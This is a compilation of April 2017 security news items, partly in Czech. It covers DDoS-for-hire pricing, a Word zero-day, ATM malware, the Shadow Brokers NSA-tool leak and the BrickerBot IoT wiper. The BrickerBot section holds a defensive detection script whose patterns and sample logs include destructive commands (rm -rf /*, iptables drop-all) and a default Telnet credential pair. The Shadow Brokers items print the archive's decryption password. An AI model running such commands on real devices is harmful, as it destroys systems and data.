So far the fraudulent messages have appeared only under the banner of Česká spořitelna. It cannot be ruled out, however, that cybercriminals will soon try the same tactic disguised as bankers from another financial institution.
Clients of other banks should therefore also be wary of similar unsolicited e-mails.
Kolik stojí DDoS? Základní přijde na pár dolarů, pokročilý na stovky
4. 4. 2017 Root.cz Počítačový útok
DDoS patří stále mezi nejrozšířenější druhy útoků a objemy neustále rostou. Důvody mohou být různé, od pouhého vandalismu až k vydírání. Zájem o ně je velký a jsou účinné. Není divu, že se dají pronajmout jako služba.
DDoS je velmi oblíbeným nástrojem kyberzločinu, původně šlo o nástroj pomsty, aktivizmu nebo prosté zábavy. Postupně se jeho použití zaměřilo na nebezpečné vydírání, kdy útočníci osloví konkrétní společnost a požadují platbu. V opačném případě vyhrožují zahájením DDoS útoků a odstavením služeb. Zejména provozovatelé e-shopů se podobné hrozby děsí, především v období Vánoc.
Obětí se může stát vlastně kdokoliv, provést takový útok je velmi snadné, proto je to i levné. Podobně jako je možné si pronajmout celý botnet nebo ransomware, je možné si pronajmout DDoS jako službu. Pokud nemá cílová síť dobře navrženou obranu, je možné ji takto velmi snadno (a levně) úplně odstavit.
DDoS jako služba
Společnost Kaspersky zveřejnila analýzu současných služeb, které nabízí pronájem DDoS útoků. Společného mají především to, že se snaží svým zákazníkům vycházet maximálně vstříc. Vše je možné ovládat pomocí webového rozhraní, služby mají různé cenové programy a věrným zákazníkům dokonce nabízejí různé odměny. Jde tak vlastně o byznys velmi podobný třeba pronájmu VPS, jen se v tomto případě pronajímají útoky.
Autor: Kaspersky
Ruské fórum nabízející útoky od 50 dolarů za den
Některé služby se dokonce chlubí počtem uživatelů a množstvím útoků, které už provedly nebo ten den provádějí. I když je jasné, že čísla mohou být zfalšovaná, aby se služba lépe prezentovala potenciálním zákazníkům.
Autor: Kaspersky
Desítky tisíc uživatelů a stovky tisíc útoků
Výjimkou nejsou ani podrobné statistiky jednotlivých druhů útoků včetně přehledných grafů vysvětlujících popularitu různých variant.
Autor: Kaspersky
Jaké typy útoků u nás nejvíc děláme
Podle čeho se počítá cena
Různé služby se snaží své zákazníky nalákat na výhody či vlastností, které jinde nenajdou. Opět stejně, jako je tomu i u běžných legálních podnikání. Kaspersky uvádí čtyři různé oblasti, které mohou výrazně ovlivnit výslednou cenu útoku.
Specifické cíle – služba se zaměřuje například na vládní servery. Za útok na takový cíl si ale může vyžádat výrazně vyšší částku, stejně jako za sítě s lepší ochranou. Provozovatel totiž musí filtry prozkoumat a vymyslet způsob, jak je obejít.
Zdroje útoku – různé zdroje útoků stojí různé peníze. Například útok přicházející z tisícovky napadených bezpečnostních kamer bude levnější než využití botnetu sestaveného ze stovky napadených serverů. Vytvořit botnet ze špatně zabezpečených IoT zařízení je výrazně jednodušší a tedy i levnější.
Různé scénáře útoku – pokud si budete chtít nechat útok ušít na míru nebo budete požadovat něco specifického, zaplatíte více. Příkladem může být kombinovaný útok nebo rychlé změny útočných vektorů během krátkých časových oken.
Průměrná cena v konkrétní zemi – také tady funguje konkurenční boj, takže služby spolu bojují o zákazníky svou cenovou politikou. Záleží také například na kupní síle místních uživatelů, takže podobná služba v USA bude stát výrazně více než v Rusku.
Per-second billing of attacks, regardless of other parameters, is also available. A five-minute DDoS can cost, for example, $5, while the one-hour variant costs $90. In all cases the botnet has a capacity of 125 Gbps.
Image (credit: Kaspersky): Pay for the duration of the attack
Some cybercriminals also do not want to reveal too many details of their solutions, so they provide only general information and charge only for the attack's running time. You will not learn what kind of botnet they use or how the compromised systems are connected.
Other price lists, by contrast, take into account the kind of traffic you need to send at the victim: SYN flood, UDP flood, NTP amplification or a combination of different packets at once. An attack can be scheduled at different network layers and aimed at infrastructure or at specific services.
Image (credit: Kaspersky): Price list of a service that lets you launch an attack in literally a few clicks
Other services boast the ability to switch the attack vector very quickly. If a customer finds that the victim is resistant to, say, a SYN flood, a single click switches to a different kind of attack that the victim is less well prepared for.
Image (credit: Kaspersky): Another price list focused on attack duration
Special rates are charged for well-protected networks that use DDoS protection. An attack on such a network costs, say, $400 per day, because the service operator has to be more inventive and try to break through the target network's defences.
Likewise, attacks on government servers cost significantly more. These are often under the protection of security agencies, and botnet operators do not want to expose their compromised machines. They therefore either do not attack such targets at all or have special, higher-priced tariffs for them.
It is also interesting that some operators have no problem offering protection against DDoS attacks alongside organizing them.
Image (credit: Kaspersky): We will attack you or protect you
An example of financing an attack
Kaspersky also gives a concrete example of how such an attack is financed. When Amazon's cloud is abused, renting one virtual server costs thousandths of a dollar per hour of operation. If the attacker needs fifty of them, that comes to just under half a dollar per hour. Including other costs, the attack costs about four dollars.
Image (credit: Kaspersky): Price list of Amazon's virtual servers
Renting a botnet of a thousand ordinary computers costs seven dollars per hour. Tens of dollars are charged for such an attack, however, which makes it clear that the attackers running DDoS services earn a very decent income from every attack they carry out.
Users of these services know exactly what they get for their money. A short attack costs a few dollars and can significantly harm the victim. If an e-shop orders an attack on a competitor, for example, it can hurt the competitor twice over: customers cannot buy and, ideally, switch to the e-shop that ordered the attack. If the attack also lasts a whole day, the losses can be enormous.
Operators of these services keep looking for the cheapest way to build botnets; the latest trend is various IoT devices such as cameras, televisions or mobile phones. If security holes exist in such devices, attackers will sooner or later find and exploit them. The easier and cheaper it is for them to build a botnet, the better.
It is first and foremost about money: the costs are relatively low and extortion pays off for the attackers. That is why the popularity of DDoS services is growing. In the future we can probably expect only further price drops and increased availability and frequency of such services.
Beware of an Unpatched Microsoft Word 0-Day Flaw being Exploited in the Wild
9.4.2017 thehackernews Vulnerability
It's 2017, and opening a simple MS Word file could compromise your system.
Security researchers are warning of a new in-the-wild attack that silently installs malware on fully-patched computers by exploiting a serious — and as yet unpatched — zero-day vulnerability in all current versions of Microsoft Office.
The Microsoft Office zero-day attack, uncovered by researchers from security firms McAfee and FireEye, starts simply with an email that attaches a malicious Word file containing a booby-trapped OLE2link object.
When opened, the exploit code gets executed and makes a connection to a remote server controlled by the attacker, from where it downloads a malicious HTML application file (HTA) that's disguised as a document created in Microsoft's RTF (Rich Text Format).
The HTA file then gets executed automatically with attackers gaining full code execution on the victim’s machine, downloading additional payloads from "different well-known malware families" to take over the victim's PC, and closing the weaponized Word file.
Zero-Day Attack Works on All Windows OS — Even Windows 10
According to researchers, this zero-day attack is severe as it gives the attackers the power to bypass most exploit mitigations developed by Microsoft, and unlike past Word exploits seen in the wild, it does not require victims to enable Macros.
Due to these capabilities, this newly discovered attack works on all Windows operating systems even against Windows 10, which is believed to be Microsoft's most secure operating system to date.
Besides this, the exploit displays a decoy Word document for the victims to see before terminating in order to hide any sign of the attack.
"The successful exploit closes the bait Word document and pops up a fake one to show the victim," McAfee researchers wrote in a blog post published Friday. "In the background, the malware has already been stealthily installed on the victim's system."
"The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office."
Microsoft is aware of the zero-day flaw as the researchers say they responsibly disclosed the issue to the company after detecting active attacks leveraging this unpatched flaw back in January this year.
FireEye disclosed the details of the vulnerability a day after McAfee went public with the flaw.
Microsoft's next scheduled release of security updates is this Tuesday, so it's highly unlikely the company will be able to deliver a patch before that day.
How to Protect Yourself against this Attack?
Since the attack works on fully patched systems, users are highly advised to follow the recommendations below to mitigate such attacks:
Do not open or download any suspicious Word files that arrive in an e-mail, even if you know the sender, until Microsoft releases a patch.
Since the attack does not work when a malicious document is viewed in Office's Protected View, users are advised to enable this feature for viewing any Office documents.
Always keep your system and antivirus up-to-date.
Regularly back up your files to an external hard drive.
Disabling macros does not offer any protection against this attack, but users are still advised to do so to protect themselves against other attacks.
Always be wary of phishing emails, spam, and malicious attachments.
ATMitch – Crooks stole $800,000 from 8 ATMs in Russia using Fileless Malware
9.4.2017 securityaffairs Virus
According to Kaspersky Lab, crooks have robbed at least 8 ATMs in Russia and stole $800,000 in just one night using a Fileless malware dubbed ATMitch.
According to experts at Kaspersky, hackers have robbed at least 8 ATMs in Russia and stole $800,000 in just one night.
The cyber heist caught the attention of security experts who, analyzing the CCTV footage, noticed a man walking up to the ATM and collecting cash apparently without interacting with the machine.
Security teams at the affected banks haven't found any evidence of the presence of malware or any sign of an intrusion. Just one of the targeted banks reported having discovered two files containing malware logs on the ATM.
The experts have discovered the following strings in the log files:
“Take the Money Bitch!”
“Dispense Success.”
In February, malware researchers at Kaspersky Lab reported that crooks had hit over 140 enterprises, including banks, telecoms, and government organizations in 40 countries. The cybercriminals leveraged 'fileless malware.'
Malicious code is directly injected into the memory of the infected machine and the malware executes in the system’s RAM.
“A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers.” reads the analysis published by Kaspersky.
The attack was first spotted by a bank's security team that discovered a copy of the Meterpreter code, an in-memory component of the Metasploit framework, in the physical memory of a Microsoft domain controller (DC).
The experts at Kaspersky Lab tracked the threats as MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. The malware leverages PowerShell scripts stored in the Windows registry to load the Meterpreter code directly into memory; similar PowerShell-based techniques had already been adopted by other malware in the wild.
Malware researchers believe that the hackers who targeted the banks carried out the attacks with fileless malware.
During the recent Kaspersky Security Analyst Summit held in St. Maarten, security researchers Sergey Golovanov and Igor Soumenkov provided further details about their investigation on the ATM hacks against two Russian banks.
Experts have tracked the malware as ATMitch; it was first spotted in Russia and Kazakhstan. The malicious code is remotely installed and executed on ATMs via the ATM's remote administration module.
“The malware, which we have dubbed ATMitch, is fairly straightforward. Once remotely installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank, the malware looks for the “command.txt” file that should be located in the same directory as the malware and created by the attacker.” reads the analysis from Kaspersky.
The attackers connect to the ATM via an SSH tunnel, install the malicious code and use it to instruct the ATM to dispense cash.
Since the fileless malware leverages existing legitimate tools on the machine to remotely send the command to dispense the money, an operation that is very quick, just a few seconds are enough to empty the ATM without leaving traces.
“The malware uses the standard XFS library to control the ATM. It should be noted that it works on every ATM that supports the XFS library (which is the vast majority).” states Kaspersky.
The experts highlighted that the attackers used a sophisticated method to compromise the bank network and access the ATM's back-end panel.
To avoid triggering the alarm, attackers physically accessed the ATM by drilling a golf-ball-sized hole in the front panel. The hole allows the attackers to access the cash dispenser panel using a serial distributed control wire (SDC RS485 standard).
Kaspersky experts explained that the technique was discovered after the police arrested a man dressed as a construction worker while he was drilling into an ATM.
Malware researchers warn ATM manufacturers and banks that crooks across Russia and Europe have already used the ATM drill attack for cyber heists.
Researchers did not identify a specific criminal gang behind these ATM hacks; however, they noticed that the source code used in the attacks contains references to the Russian language.
Kaspersky has discovered many similarities with techniques used by the Carbanak and GCMAN cyber gangs.
Millions of mobile phones and laptops potentially exposed to attack leveraging baseband zero-days
9.4.2017 securityaffairs Vulnerability
The researcher Ralf Weinmann revealed that millions of mobile phones and laptops are potentially exposed to attack leveraging baseband zero-days he discovered.
The researcher Ralf-Phillip Weinmann, managing director at security firm Comsecuris, has disclosed a zero-day baseband vulnerability affecting Huawei smartphones, laptop WWAN modules, and IoT components.
Baseband is firmware used on smartphones to connect to cellular networks, to make voice calls, and transmit data.
An attacker can exploit baseband flaws to eavesdrop on mobile communications, take over the device to make calls and send SMS messages to premium numbers, or exfiltrate data.
The expert revealed the flaw this week at the Infiltrate Conference. The vulnerability could be exploited by attackers to carry out a memory-corruption attack against affected devices over the air.
Fortunately, the attack is quite difficult to conduct.
The baseband vulnerability resides in the HiSilicon Balong integrated 4G LTE modems. The Balong application processor is called Kirin; it is produced by HiSilicon Technologies, a subsidiary of Huawei Technologies. The affected firmware is present in several Huawei Honor smartphones, including the P10, Huawei Mate 9, Honor 9, 7, 5c and 6.
Weinmann believes that millions of Honor smartphones could be exposed to the attack.
Weinmann presented multiple baseband vulnerabilities found in the Kirin application processor.
The expert also revealed that many laptops produced by IT vendors use the HiSilicon Balong integrated modem, as do a number of IoT devices.
“This baseband is much easier to exploit than other basebands. Why? I’m not sure if this was intentional, but the vendor actually published the source code for the baseband which is unusual,” Weinmann said. “Also, the malleability of this baseband implementation doesn’t just make it good for device experimenting, but also network testing.”
Weinmann speculates HiSilicon may have mistakenly released the Kirin source code as part of a developer tar archive associated with the Huawei H60 Linux kernel data.
Weinmann demonstrated several attack scenarios against mobile phones.
The first attack scenario presented by the researcher involves setting up a bogus base station using the open-source software OpenLTE, which the attacker uses to simulate a network operator. The attacker can send specially crafted packets over the air that trigger a stack buffer overflow in the LTE stack, causing the phone to crash. Once the phone has rebooted, the attacker can gain persistence by installing a rootkit.
In the second attack scenario, an attacker with physical access to the phone and the private key pair data would install malicious tools in the firmware.
“It requires key material that is stored both by the carrier and on the SIM card in order to pass the mutual authentication between the phone and the network. Without this key material, a base station cannot pose as a legit network towards the device.”
For his tests, Weinmann used his own VxWorks build environment based on an evaluation version of VxWorks 7.0 that shipped with the Intel Galileo several years ago. The expert explained that the existence of a Lua scripting interpreter running in the baseband gives him further offensive options.
Weinmann did not disclose the technical details, to avoid threat actors in the wild abusing his research.
“I have chosen to only disclose lower-severity findings for now. Higher severity findings are in the pipeline.” Weinmann said.
Network of Indian fraudsters extracted hundreds of millions of dollars from Americans over the phone
9.4.2017 Novinky/Bezpečnost Crime
Indian police have managed to detain the head of a network of phone scammers who posed as employees of US government agencies and swindled several thousand Americans out of hundreds of millions of dollars. The group operated from Mumbai and, according to Reuters, police caught its boss on Saturday.
Sagar Thakkar was detained in the early hours at Mumbai airport. Indian police had earlier revealed that the 24-year-old Thakkar lived an ostentatious lifestyle, owned luxury cars and stayed in five-star hotels. His criminal ring of phone operators robbed US citizens of more than 300 million dollars (7.5 billion Czech crowns).
The Indian fraudsters, operating from several call centres on the outskirts of Mumbai, posed over the phone as employees of US agencies such as the Internal Revenue Service (IRS). They threatened at least 15,000 Americans with fines, imprisonment or deportation unless they repaid fictitious debts to the government. According to a US Department of Justice report, the money from the victims was then laundered by accomplices there, who often used stolen or fake identities.
Detailed knowledge of the system
Indian police shut down the fraudulent operation, which had been running for more than a year, last October after raids on a number of Mumbai call centres. More than 700 suspects were detained at the time. Police commissioner Param Bir Singh said at a press conference today that four hundred people have been charged in the case, about ten of whom are in custody.
Maharashtra Today (@todaymaharasht1), 8:51 AM - 8 Apr 2017: Sagar Thakkar alias ‘Shaggy’ arrested by Thane Police over call centre scam. - http://www.maharashtratoday.in/thane-call-centre-scam-police-arrest-aide-mastermind-sagar-thakkar-suspected-europe/19 …
Photo: the detained Sagar Thakkar
US and Indian authorities are cooperating in the investigation, but the US side has announced that it will seek the extradition of the Indian fraudsters to the USA. Last October, as part of the case, the US Department of Justice also charged 60 people in the USA and India with conspiracy to commit identity theft, impersonation of US officials, bank fraud and money laundering.
According to commissioner Singh, Sagar Thakkar was charged in December, after he had fled to Dubai following the October raids. Singh said he had interrogated Thakkar and was “amazed by his knowledge of the American and Indian systems”. He added that the 24-year-old Indian had confessed to his role in the fraud group.
The Shadow Brokers release more alleged NSA hacking tools and exploits
9.4.2017 securityaffairs BigBrothers
The Shadow Brokers hacking crew sent a message to President Trump commenting recent political events and released more alleged NSA hacking tools.
The Shadow Brokers is the mysterious group that in October 2016 claimed to have stolen a bunch of hacking tools used by the NSA for its operations.
At the end of October 2016, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.
The Equation Group compromised these targets using the hacking tools codenamed INTONATION and PITCHIMPAIR. The Shadow Brokers provided links to two distinct PGP-encrypted archives; the first one was offered for free as proof of the hack (its passphrase was ‘auctioned’), and for the second one the group requested 1 million BTC.
The first archive contained roughly 300MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION. The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.
The majority of the files are at least three years old, with the newest timestamp dating to October 2013. In early October, TheShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the group expressed his dissent at the lack of interest in ponying up bitcoins to release the full NSA data dump. That was a couple of weeks before the group announced the launch of a crowdfunding campaign for the stolen arsenal, because its auction had received offers for less than two bitcoins.
In December 2016, the Shadow Brokers changed the sales model and put the NSA’s hacking arsenal up for direct sale on an underground website.
Back to the present, today the Shadow Brokers group released more alleged hacking tools and exploits that allegedly belong to the Equation Group.
The group has dropped the bomb: it has finally released the password for the encrypted dump of NSA files, and anyone can access them.
The group shared the following password in a blog post on the Medium platform titled “Don’t Forget Your Base”:
CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN
The post is an open letter to President Donald Trump in which the group expresses its views on Trump’s policy; it explicitly refers to Goldman Sachs, the air strike against Syria and the removal of Steve Bannon from the National Security Council, among others.
“Respectfully, what the fuck are you doing? TheShadowBrokers voted for you. TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning “your base”, “the movement”, and the peoples who getting you elected.” reads the post.
A security expert who goes online by the Twitter handle x0rz has uploaded all the files, after decryption, to GitHub.
A close look at the archive revealed the existence of numerous tools developed to target specific platforms, including:
rpc.cmsd, a remote root zero-day exploit for the Solaris Unix-based operating system.
x0rz (@x0rz), 3:42 PM - 8 Apr 2017: Solaris rpc.cmsd remote root exploit (TAO's EASYSTREET) #0day
The NSA’s access inside the GSM network of Pakistan’s mobile operator Mobilink.
x0rz (@x0rz), 5:41 PM - 8 Apr 2017: NSA operators notes about their access inside 🇵🇰Pakistan Mobilink GSM network https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/doc/old/etc/user.mission.sicklestar.COMMON … #ShadowBrokers #EquationGroup #APT
The NSA Tailored Access Operations team (TAO) used the TOAST framework to clean logs of Unix wtmp events.
x0rz (@x0rz), 4:50 PM - 8 Apr 2017: TAO's TOAST framework used to clean Unix wtmp events, no logs no crime 😏 #opsec
The Equation Group used the ElectricSlide tool to impersonate a Chinese browser with a fake Accept-Language header.
x0rz (@x0rz), 5:53 PM - 8 Apr 2017: One of the #EquationGroup tool (ELECTRICSLIDE) impersonates a Chinese browser with fake Accept-Language https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/bin/electricslide.pl …
If you want, the group is still accepting donations; its Bitcoin wallet, 19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK, has received a total of 10.41198465 bitcoins.
Shadow Brokers Group Releases More Stolen NSA Hacking Tools & Exploits
8.4.2017 thehackernews BigBrothers
Remember The Shadow Brokers? They are back.
A hackers group that previously claimed to have stolen a bunch of hacking tools (malware, zero-day exploits, and implants) created by the NSA and gained popularity last year for leaking a portion of those tools is back.
Today, The Shadow Brokers group released more alleged hacking tools and exploits that, the group claims, belonged to "Equation Group" – an elite cyber attack unit linked to the NSA.
Besides dumping some of the NSA's hacking tools back in August 2016, the Shadow Brokers also released an encrypted cache of files containing more NSA hacking tools and exploits in an auction, asking for 1 Million Bitcoins (around $568 Million).
However, after the failed auction, the group put those hacking tools and exploits up for direct sale on an underground website, categorizing them by type — like "exploits," "Trojans," and "implants" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
Now, the Shadow Brokers have finally released the password for the encrypted cache of NSA files, allowing anyone to unlock and download the auction data dump.
CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN
The password mentioned above for the encrypted NSA files was made public through a blog post published today.
The blog post, titled "Don't Forget Your Base," has been written as an open letter to President Donald Trump, containing the Shadow Brokers' political views on Trump's recent policies and events, like Goldman Sachs, the air strike against Syria and the removal of Steve Bannon from the National Security Council, among others.
A security researcher who uses the Twitter handle x0rz has uploaded all the files, after decryption, to GitHub and confirmed that the archive includes:
rpc.cmsd, a remote root zero-day exploit for Solaris, the Oracle-owned Unix-based operating system.
The TOAST framework that NSA's TAO (Tailored Access Operations) team used to clean logs of Unix wtmp events.
The Equation Group's ElectricSlide tool that impersonates a Chinese browser with fake Accept-Language.
Evidence of NSA operators' access inside the GSM network of Mobilink, one of Pakistan's popular mobile operators.
More key findings will come as soon as other security researchers delve into the dump.
At this time, it is not confirmed whether the group holds more NSA hacking tools and exploits or whether this is the last batch of documents the Shadow Brokers stole from the United States intelligence organization.
RensenWare ransomware – You will decrypt files only scoring .2 Billion in TH12 Game
8.4.2017 securityaffairs Virus
The rensenWare ransomware, rather than demanding money, requires victims to score “over 0.2 billion” playing the “TH12” game.
Security experts at MalwareHunterTeam have spotted a new ransomware dubbed ‘rensenWare’. The ransomware is very unusual: rather than demanding money, it requires the victims to score “over 0.2 billion” playing “TH12 — Undefined Fantastic Object”.
The RensenWare ransomware scans a machine for certain file types and uses AES-256 to encrypt the files. When the malware encrypts a file, it appends the .RENSENWARE extension to it.
When RensenWare completes the file encryption, it displays a ransom note featuring Captain Minamitsu Murasa from the Touhou Project series of shooting games made by Team Shanghai Alice.
The ransom note tells the victims that they must score over .2 billion in the Lunatic level of a Touhou Project game called TH12 ~ Undefined Fantastic Object. If the victim does not reach that score or closes the ransomware, they will never be able to recover the files.
“That’s easy. You just play TH12 ~ Undefined Fantastic Object and score over 0.2 billion in LUNATIC level. this application will detect TH12 process and score automatically. DO NOT TRY CHEATING OR TERMINATE THIS APPLICATION IF YOU DON’T WANT TO BLOW UP THE ENCRYPTION KEY!” reads the ransom note.
MalwareHunterTeam (@malwrhunterteam), 7:05 PM - 6 Apr 2017: Found a surprising ransomware today: "rensenWare". Not asks for any money, but to play a game until you reach a score - and it's not a joke.
“A new ransomware called RensenWare was discovered today by MalwareHunterTeam that makes a unique ransom demand; score over 0.2 billion in the LUNATIC level of TH12 ~ Undefined Fantastic Object or kiss your files goodbye!” wrote Lawrence Abrams from BleepingComputer. “While I do not think this ransomware was ever meant to be distributed, it shows what a creative developer can do to torment their victims.”
The RensenWare ransomware monitors the victim's gaming progress by looking for a process called “th12.” The malware reads the process's memory to determine the current score and level of the game. When the victim reaches the Lunatic level and has scored over .2 billion points, the ransomware saves the key to the Desktop and initiates the decryption process.
Lawrence Abrams rules out the possibility that rensenWare was developed for criminal purposes: “this program was most likely created as a joke. Regardless of the reasons, it illustrates another new and innovative way that a ransomware can be developed.”
During the encryption operation, the malware does not try to delete shadow volumes or take any other action to prevent a victim from restoring their files. This suggests the ransomware was created as a joke or only to disturb a specific group of people.
The author of the ransomware, Tvple Eraser, explained the intent in a message shared on Twitter:
Tvple Eraser (@0x00000Ff), 3:00 PM - 7 Apr 2017: Hell, I'll NEVER make any malware or any similar thing. making was so fun, however as a result, it made me so exhausted, /w no foods all day
The rensenWare ransomware demonstrates the great creativity of the malware-coding community; the experts have no doubt we will see many other ‘creative’ themes in the future.
This malware does not represent a threat, but it has the potential to become one.
Brickerbot botnet, the thingbot that permanently destroys IoT devices
8.4.2017 securityaffairs BotNet
Security researchers have spotted a new threat dubbed Brickerbot botnet that causes permanent damage to Internet of Things (IoT) devices.
Months ago we anticipated a possible spike in the number of IoT botnets. At the beginning it was Mirai, but later other dangerous thingbots appeared in the wild, such as the Leet botnet and the Amnesia botnet.
Now a new botnet, dubbed Brickerbot, has appeared in the threat landscape. It was spotted by researchers at Radware, who found many similarities with the dreaded Mirai botnet.
The main difference from the Mirai botnet is that this threat permanently destroys poorly configured IoT devices.
The Brickerbot botnet was discovered on March 20 when researchers at Radware observed attacks against one of its honeypots.
“Over a four-day period, Radware’s honeypot recorded 1,895 PDoS attempts performed from several locations around the world. Its sole purpose was to compromise IoT devices and corrupt their storage.” reads the analysis shared by Radware. “Besides this intense, short-lived bot (BrickerBot.1), Radware’s honeypot recorded attempts from a second, very similar bot (BrickerBot.2) which started PDoS attempts on the same date – both bots were discovered less than one hour apart – with lower intensity but more thorough and its location(s) concealed by TOR egress nodes.”
The honeypot logged 1,895 infection attempts by the Brickerbot botnet in just four days; most of the attacks originated from Argentina, while 333 attempts came from a Tor node.
The Brickerbot botnet leverages Telnet brute force to compromise IoT devices, a technique similar to Mirai’s.
Bricker does not try to download a binary, which means that the experts from Radware were not able to retrieve the complete list of credentials used in the bot's brute force attempts; the researchers were only able to record that the first attempted username/password pair was ‘root’/’vizxv.’
“Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently ‘root’/’vizxv.'” continues the advisory.
The malicious code targets Linux-based IoT devices running the BusyBox toolkit which have their Telnet port open and exposed on the Internet.
The PDoS attack attempts originated from a limited number of IP addresses; the IoT devices behind them expose port 22 (SSH) and run an older version of the Dropbear SSH server. Shodan identifies the vast majority of these devices as Ubiquiti network devices.
Once the malware has infected the device, it starts scrambling the onboard memory using rm -rf /* and disabling TCP timestamps. It also limits the maximum number of kernel threads to one.
The Brickerbot malware also flushes all iptables firewall and NAT rules and adds a rule to drop all outgoing packets. It tries to wipe all code on the vulnerable IoT device, making it unusable.
Experts at Radware provided the following suggestions to protect IoT Devices:
Change the device’s factory default credentials.
Disable Telnet access to the device.
Network behavioral analysis can detect anomalies in traffic and can be combined with automatic signature generation for protection.
User/entity behavioral analysis (UEBA) to spot granular anomalies in traffic early.
An IPS should block Telnet default credentials or reset Telnet connections. Use a signature to detect the provided command sequences.
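The last recommendation, a signature for the command sequence, is easy to prototype against Telnet honeypot logs. The script below is an added example, not Radware's code; the log format and sample lines are constructed, the indicators come from the behaviour described above (the root/vizxv first credential pair, rm -rf /*, TCP timestamps disabled, the kernel thread limit, iptables/NAT flush, drop all outgoing traffic), and the sysctl key names are my assumption of how those steps look in a session.

```python
"""Flag BrickerBot-style PDoS sessions in constructed Telnet honeypot logs."""
import re
from collections import defaultdict

# First username/password pair Radware saw the bot try.
FIRST_CREDENTIALS = ("root", "vizxv")

# One regex per step of the destructive sequence. The sysctl key names
# (tcp_timestamps, threads-max) are assumptions about how "disable TCP
# timestamps" and "limit kernel threads to one" appear in a shell session.
INDICATORS = {
    "wipe_storage":   re.compile(r"\brm\s+-rf\s+/\*"),
    "tcp_timestamps": re.compile(r"\btcp_timestamps\b"),
    "threads_max":    re.compile(r"\bthreads-max\b"),
    "iptables_flush": re.compile(r"\biptables\s+(?:-t\s+nat\s+)?(?:-F|--flush)\b"),
    "drop_outgoing":  re.compile(r"\biptables\s+-A\s+OUTPUT\s+-j\s+DROP\b"),
}

# Constructed honeypot log format: "<timestamp> <source-ip> LOGIN|CMD ...".
LOGIN_RE = re.compile(
    r"^\S+\s+(?P<ip>\S+)\s+LOGIN\s+user=(?P<user>\S+)\s+pass=(?P<pw>\S+)")
CMD_RE = re.compile(r"^\S+\s+(?P<ip>\S+)\s+CMD\s+(?P<cmd>.+)$")


def new_session():
    return {"default_creds": False, "indicators": set(), "verdict": "benign"}


def analyze(lines):
    """Group log lines by source IP and return {ip: findings}."""
    sessions = defaultdict(new_session)
    for line in lines:
        m = LOGIN_RE.match(line)
        if m:
            # Count the attempt whether or not it succeeded: the pair itself
            # is the signal that a Mirai-style credential list is in play.
            if (m["user"], m["pw"]) == FIRST_CREDENTIALS:
                sessions[m["ip"]]["default_creds"] = True
            continue
        m = CMD_RE.match(line)
        if not m:
            continue  # unrelated log line
        found = sessions[m["ip"]]["indicators"]
        for name, rx in INDICATORS.items():
            if rx.search(m["cmd"]):
                found.add(name)
    for s in sessions.values():
        # The wipe alone, or two of the supporting steps, is a PDoS session;
        # the default credential pair alone only warrants a closer look.
        if "wipe_storage" in s["indicators"] or len(s["indicators"]) >= 2:
            s["verdict"] = "pdos"
        elif s["default_creds"]:
            s["verdict"] = "suspicious"
    return dict(sessions)


# Constructed sample: one full BrickerBot-like session, one failed
# brute-force attempt, one unrelated login (documentation IP ranges only).
SAMPLE_LOG = """\
2017-03-20T08:14:01Z 203.0.113.7 LOGIN user=root pass=vizxv result=success
2017-03-20T08:14:02Z 203.0.113.7 CMD busybox rm -rf /*
2017-03-20T08:14:02Z 203.0.113.7 CMD sysctl -w net.ipv4.tcp_timestamps=0
2017-03-20T08:14:03Z 203.0.113.7 CMD sysctl -w kernel.threads-max=1
2017-03-20T08:14:03Z 203.0.113.7 CMD iptables -F; iptables -t nat -F
2017-03-20T08:14:04Z 203.0.113.7 CMD iptables -A OUTPUT -j DROP
2017-03-20T08:20:11Z 198.51.100.9 LOGIN user=admin pass=admin result=fail
2017-03-20T08:20:12Z 198.51.100.9 LOGIN user=root pass=vizxv result=fail
2017-03-20T08:30:00Z 192.0.2.44 LOGIN user=ubnt pass=s3cret-example result=success
2017-03-20T08:30:05Z 192.0.2.44 CMD uptime
"""

if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG.splitlines()).items():
        print(f"{ip:<14} {s['verdict']:<10} {sorted(s['indicators'])}")
```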
Every fourth attack is the work of the Danger virus
8.4.2017 Novinky/Bezpečnost Viruses
The malicious code Danger has held the very top of the ranking of the most widespread virus threats for the past several months. Last month was no different: this uninvited guest was responsible for every fourth computer attack. That follows from an analysis by the antivirus company Eset.
At the turn of the year, the number of detected attacks attributed to Danger fell noticeably. In recent weeks, however, cybercriminals have been deploying it more and more often again.
And it evidently pays off for them. This malicious code opens a backdoor into the operating system. Through it, attackers can then smuggle further malicious code onto the infected computer; most often they use it to spread extortion viruses of the ransomware family.
They want a ransom
These malicious codes start encrypting the contents of the computer and show the user a notice that they must pay to have the computer decrypted, otherwise they will supposedly never get to their data again.
Even after paying the ransom, users have no guarantee that they will actually regain access to their data. The virus must be uninstalled from the computer and the data then decrypted with a special program. In some cases, however, that is not possible.
The threat, whose full name is JS/Danger.ScriptAttachment, should therefore definitely not be underestimated. The pest spreads mainly through unsolicited e-mails, which is exactly what users should be most careful about. A discount, or even a prize, that looks tempting at first glance may not be real, and Danger may be hiding behind it.
